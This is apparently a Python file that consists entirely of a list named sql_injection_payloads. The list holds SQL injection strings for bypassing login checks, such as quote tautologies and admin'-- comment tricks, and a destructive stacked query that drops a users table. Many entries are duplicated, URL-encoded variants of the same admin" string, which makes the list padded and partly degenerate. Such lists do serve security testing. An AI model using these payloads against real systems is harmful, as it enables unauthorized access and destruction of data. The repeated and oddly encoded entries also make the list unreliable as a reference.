sql_injection_payloads = [
    "'",
    "1' OR '1'='1",
    "1'; DROP TABLE users;--",
    "admin'--",
    "') OR ('a'='a",
    "') OR 1=1--",
    "' OR '1'='1",
    '") OR ("a"="a',
    '" OR "1"="1',
    'admin" --',
    'admin" --',
    "' OR 1=1--",
    '" OR 1=1--',
    "admin';--",
    'admin" --',
    'admin" --',
    'admin" #',
    'admin" ##',
    'admin" %20--',
    'admin" %20--',
    'admin" %23',
    'admin" %23',
    'admin" %23',
    'admin" %23',
    'admin" /*',
    'admin" /*',
    'admin" %00',
    'admin" %00',
    'admin" /*',
    'admin" /*',
    'admin" %25\'',
    'admin" %25\'',
    'admin" %00\'',
    'admin" %00\'',
    'admin" %23\'',
    'admin" %23\'',
    'admin" %25"',
    'admin" %25"',
    'admin" %00"',
    'admin" %00"',
    'admin" %23"',
    'admin" %23"',
    'admin" %2527',
    'admin" %2527',
    'admin" %2527"',
    'admin" %2527"',
    'admin" %2527#',
    'admin" %2527#',
    'admin" %2527%2523',
    'admin" %2527%2523'
]
